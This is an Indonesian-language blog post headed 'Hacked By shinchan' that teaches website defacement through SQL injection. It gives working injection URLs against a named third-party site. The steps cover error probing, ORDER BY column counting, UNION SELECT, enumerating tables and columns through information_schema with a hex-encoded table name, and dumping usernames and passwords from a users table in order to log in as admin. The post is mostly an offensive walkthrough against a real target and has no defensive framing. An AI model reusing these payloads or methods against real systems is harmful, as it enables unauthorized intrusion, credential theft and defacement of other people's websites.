Hacked By Shinchan7Fold


Hacked By shinchan

== WELCOME ==

==> ☻☻ semua yang ada di dunia ini hanyalah milik tuhan jadi janganlah kalian bersombong diri dan menganggap rendah orang lain..... ☻☻<==
karena kita semua sama....
Berbagilah ilmu dengan siapapun,dimanapun,kapanpun....karena ilmu tidaklah berguna klo tidak di amalkan



Rabu, 02 Juni 2010

Deface Web With SQL injection


1. Cek Bug
target http://www.ymtltd.co.uk/new.php?id=11

qta tambah tnda petik satu (') di akhir angka jdi sprti ini

http://www.ymtltd.co.uk/new.php?id=11'

muncul pesan erornya,

2.Mencari nomor kolom
trus qta cari jmlah kolomnyanya pke perintah
+order+by+(jumlah angka)--

http://www.ymtltd.co.uk/new.php?id=11+order+by+3--
pesan error nya ngga da......
singkat cerita saya nemu pesan eror di angka 17,jdi angka yg ngga error sampe 16.....
http://www.ymtltd.co.uk/new.php?id=11+order+by+16-- < no error
http://www.ymtltd.co.uk/new.php?id=11+order+by+17-- < error

3.Menggunakan fungsi UNION
qta lanjut langkah buat nampilin angka" anehnya pke perintah
+union+all+(angka sblum angka eror)--

http://www.ymtltd.co.uk/new.php?id=-11+union+all+select+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16--


nnti kluar angka" misalnya angka 2 atau 4..

4. Melihat versi Mysql
pilih salah satu angka yg muncul trsebut untuk melihat versi sql nya dgn printah version() atau @@version
misalnya saia pilh angka 2.

http://www.ymtltd.co.uk/new.php?id=-11+union+all+select+1%2Cversion(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--

stelah terlihat versiny 5 lanjut langkah slanjutnya

5.Mencari table dan column
qta cari nama tablenya dgn perintah
group_concat(table_name)
ganti slah satu angka yg tmpil di layar monitornya.... trus di akhir stelah angka ditambain
+from+information_schema.tables+where+table_schema=database()
msal yg saya ganti angka 4 jdi sprti ini

http://www.ymtltd.co.uk/new.php?id=-11+union+all+select+1%2Cversion(),2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+where+table_schema=database()--

nnti kluar nama" table, cri yg kmungkinan ada usernya..
disini saya ambil users trus table tdi di convert dlu ke bentuk hexa jdi seperti ini 7573657273

trus qta ganti
group_concat(table_name) jadi (column_name)
table_schema jadi table_name
database() diganti sama angka hexa tdi jgn lupa di tambah 0x di awal angka jdi hasil seperti ini

http://www.ymtltd.co.uk/new.php?id=-11+union+all+select+1%2Cversion(),3,group_concat(column_name),6,7,8,9,10,11,12,13,14,15,16+from+information_schema.columns+where+table_name=0x7573657273--

dah kluar qta tinggal liat isi column group_concat(column_name) ganti jdi concat_ws(0x3a,nama" isi column yg mu diliat) trus yg akhir jdi
+from+nama_column yg mau di liat isinya seperti ini

http://www.ymtltd.co.uk/new.php?id=-11+union+all+select+1%2Cversion(),3,concat_ws
(0x3a,id,username,password),6,7,8,9,10,11,12,13,14,15,16+from+users--

maka akan muncul tampilan data 1:admin:pass
udah gitu tinggal login deh ke halaman dngan username n password yg udah di dapet tadi..
semoga bermanfaat.
Diposting oleh ▬ Masih Seperti Dulu ▬ di 20.34

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)